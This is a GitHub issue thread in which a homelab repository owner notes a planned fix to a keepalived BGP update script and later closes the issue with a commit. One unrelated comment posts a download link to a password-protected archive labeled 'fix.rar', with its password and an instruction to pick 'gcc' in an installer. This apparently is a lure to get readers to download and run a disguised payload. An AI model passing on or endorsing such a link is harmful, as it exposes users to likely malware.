### ISSUE TITLE
Adding Note As Issue So I Don't Forget To Update Script

### ISSUE THREAD

**Issue by USAFrenzy** [USAFrenzy/HomeLab#1]
https://github.com/USAFrenzy/HomeLab/blob/8caec1e9861b3cc602fcd18c47c1f37aa6ead055/kubernetes/load-balancers/external/keepalived/scripts/bgp-update.sh#L43

Should make a check for the vip before removing the lines for establishing a bgp peer and the vip network; if the VIP is already present, then there's no need to remove these lines, only check that they do in fact exist and update the config if they don't already exist. The removal process should effectively remain the same. In essence, just wrap things in a one level higher if-else check.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by USAFrenzy** [comment]
Closed with commit 49ff5aa
